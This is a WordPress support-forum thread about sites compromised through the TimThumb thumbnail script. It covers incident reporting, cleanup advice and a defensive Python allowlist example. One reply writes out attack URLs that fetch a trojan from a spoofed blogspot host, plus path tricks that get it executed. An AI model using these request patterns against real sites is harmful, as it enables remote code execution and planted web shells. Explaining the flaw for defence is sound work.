Important! : Wordpress users, who have had hacked shells and .htaccess files please read.

Hi all,

I have been going through a member's website here, whose .htaccess file got hacked; most of the links were to .ru (Russian) websites. I know people here lately have had this same issue.

Going through the website I found a boolian.php file; upon checking this file it was a trojan, then my Sophos anti-virus went mad after opening it up, but that wasn't a problem.

What I would like/need you to do, if you've also been infected, is post the date you were infected, whether you have a file called boolian.php, the themes you have and the plugins you use/have.

I would appreciate as much input as possible; please be as accurate as possible when posting, and do not post personal information/passwords here.

Thank you all for your time.

Kind Regards
Jack (Coding-Monkey).

  • Jack Kitterhing
    • Code Norris

    Hi Timothy,

    Thanks, I just think it's all going to point to one thing. At the moment I have a few ideas, but I don't want to publicly put what I think, in case it isn't the case :slight_smile:

    Hopefully people will start posting soon, so we might be able to find the root of the problem.

    Also, while I'm posting, I thought of a few other things.

    When posting, please also put your hosting company and your plan, i.e. shared, VPS or dedicated. Also what WordPress version you were using when you first got infected.

    Thanks! Take care everyone and keep your websites safe! :wink:

    Kind Regards
    Jack (Coding-Monkey).

  • Jason
    • The Incredible Code Injector

    I had one of these, however it's been well documented around the web, I'll reshare what I've found here.

    There are various exploits in some themes that use a ledgen-timthumb-dary opensource script to create thumbnails. It had rudimentary security that checked to make sure the domain was in an allowed list. The problem was that the list included several widely used public sources, and also used a string comparison that could be fooled.

    Normally, thumbnailed images were linked by the theme like this:

    http://mywebsite.com/wp-content/themes/mytheme/timthumb.php?src=http://mywebsite.com/weird-cat-pic.jpg&size=400px

    What the script would then do is go to http://cool.blogspot.com/weird-cat-pic.jpg and save that remote image to your server, and then resize the image and provide a thumbnail.

    Bad people abused this by uploading a virus to their own website or another public website like Blogger. They would create a fake blog with the same name as your domain. So if your website was http://mywebsite.com they would make a fake blog with the address http://mywebsite.com.blogspot.com and this would trick the thumbnail script into thinking it was your own website. The script would then download the virus to your server from a bad person requesting the bad link. It would look something like this:

    http://mywebsite.com/wp-content/themes/mytheme/timthumb.php?src=http://mywebsite.com.blogspot.com/not-really-a-pic-actually-a-trojan.jpg&size=400px

    Timthumb will obviously fail to resize the image, but the file is now on your server!
    not-really-a-pic-actually-a-trojan.jpg is now sitting in your public timthumb cache folder.

    Now the problem is that timthumb would only download files ending in .jpg or a few other image types, and servers only execute .php files right?

    This is where the NEXT flaw in servers is used. Then they call the link to that image but it's modified to trick the server into executing it.

    http://mywebsite.com/not-really-a-pic-actually-a-trojan.jpg?
    http://mywebsite.com/not-really-a-pic-actually-a-trojan.jpg?.php
    http://mywebsite.com/not-really-a-pic-actually-a-trojan.jpg?/../&test.php

    There are a few different things that they will try, once the script is executed, they begin creating backdoors for themselves. The original way they got in is usually left there and ignored.

    Then they copy the php remote shell to various folders. I've found them in theme folders, uploads folders, wp-admin and wp-includes with convincing sounding names.

    This ensures if you do find a few, they may have one stay under the radar.

    As well as leaving behind new files, they will also copy the php shell to footer.php of your theme or sidebar.php sometimes it's just a super long single line in the middle of the file. This makes your website very slow, but then, they don't really care about that anyway, do they?

    Best bet is to erase everything and start with fresh known-good copies.
    Scan your database for injections.
    Clean the uploads folder, methodically.
    Re-download WordPress fresh and re-create your wp-config.php file. Don't use the old one.

    Best practices are to keep your server updated, keep WordPress updated, and avoid timthumb whenever, wherever possible.

    Also, erase all .htaccess files or nginx config files and make sure they are clean too.

    Extra security is to not allow php to execute in the uploads directory at all, or move it to a server without php at all.

    *Whew~* Ok I think that's my bit.
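The allowlist weakness Jason describes (a public host like blogspot.com on the trusted list, and a loose string match that `mywebsite.com.blogspot.com` slips past) can be shown side by side with a hardened check. The following is an added example written for this thread, not timthumb's code or anything from the original posts; the hostnames, the `LEGACY_ALLOWED` list and the sample payload bytes are constructed for illustration.

```python
"""Weak vs. strict source checks for a remote-thumbnail fetcher (added example)."""
from urllib.parse import urlparse

# Constructed: this site's own host, and the kind of allowlist the post describes
# (the site plus several widely used public image hosts).
SITE_HOST = "mywebsite.com"
LEGACY_ALLOWED = ("mywebsite.com", "blogspot.com", "flickr.com", "picasa.com")

# Magic bytes of the image formats a thumbnailer is supposed to accept.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def weak_allowed(src_url: str) -> bool:
    """Flawed check: substring match of an allowed name anywhere in the hostname.
    'mywebsite.com.blogspot.com' contains 'mywebsite.com', so it passes."""
    host = urlparse(src_url).hostname or ""
    return any(allowed in host for allowed in LEGACY_ALLOWED)


def strict_allowed(src_url: str, site_host: str = SITE_HOST) -> bool:
    """Hardened check: http(s) only, and the parsed hostname must equal this
    site's host exactly. No public hosts, no prefix or suffix matching."""
    parts = urlparse(src_url)
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    return host == site_host.lower()


def looks_like_image(data: bytes):
    """Sniff the first bytes of a fetched file. Returns the image type, or None
    when the content is not an image (e.g. PHP source renamed to .jpg)."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def accept_fetched_file(src_url: str, data: bytes) -> bool:
    """Only cache a file if both the source host and the content pass."""
    return strict_allowed(src_url) and looks_like_image(data) is not None


if __name__ == "__main__":
    # Constructed URLs mirroring the ones in the post.
    good = "http://mywebsite.com/weird-cat-pic.jpg"
    fake = "http://mywebsite.com.blogspot.com/not-really-a-pic-actually-a-trojan.jpg"
    print("weak  :", weak_allowed(good), weak_allowed(fake))      # True True
    print("strict:", strict_allowed(good), strict_allowed(fake))  # True False
    # Constructed payload: PHP source with a .jpg name fails the content sniff.
    print("sniff :", looks_like_image(b"<?php echo 1; ?>"))      # None
```

The content sniff is the second line of defence for the other half of the post: even a file that arrives from an allowed host is only written to the cache if it actually starts like an image. Denying PHP execution in the uploads and cache directories, as the post also recommends, covers the case where both checks are missing.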

  • Jack Kitterhing
    • Code Norris

    Thanks @Jason for the info, I was aware of those particular vulnerabilities; nice to have all the info in one place :slight_smile:

    @everyone else, please can you add whether your theme uses TimThumb, thanks.

    Also, sorry for the delay in my replies, I've been away the past few days.

    Thanks!

    Kind Regards
    Jack (Coding-Monkey).
